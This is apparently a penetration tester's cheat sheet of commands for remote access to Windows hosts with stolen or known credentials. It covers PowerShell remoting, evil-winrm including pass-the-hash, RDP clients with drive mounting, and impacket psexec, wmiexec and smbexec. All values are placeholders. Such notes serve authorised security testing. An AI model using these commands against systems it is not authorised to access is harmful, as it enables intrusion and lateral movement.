Access

How to get into a system if you have creds

WinRM

Regular

Here are 3 commands:

  1. Convert the password to a secure string

  2. Put the password secure string and the username into a $cred object

  3. Use $cred for authentication

PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force

PS C:\> $cred = new-object System.Management.Automation.PSCredential ("MILITECH\sreed", $password)

PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $cred

Evil-WinRM

evil-winrm -i 13.13.13.13 -u venator17 -p S3cr3t!

evil-winrm -i 13.13.13.13 -u 'administrator' -H 'blahblahsupersecretnthash'

RDP

Rdesktop

rdesktop -u venator17 -p 'amogus' -d domain.kek 13.13.13.13

Xfreerdp

Regular

xfreerdp /u:venator17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore

With Port-Forwarding

xfreerdp /u:venator17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore

Mounting a local dir

xfreerdp /v:13.13.13.13 /u:venator17 /p:amogus /drive:share,/home/venator17/Assessment123

Remmina (GUI)

remmina

PSEXEC

impacket-psexec administrator:'password123'@13.13.13.13

WMIEXEC

impacket-wmiexec sreed:password123@13.13.13.13

SMBEXEC

impacket-smbexec sreed:password123@13.13.13.13

RUNAS

runas /netonly /user:MILITECH\sreed powershell
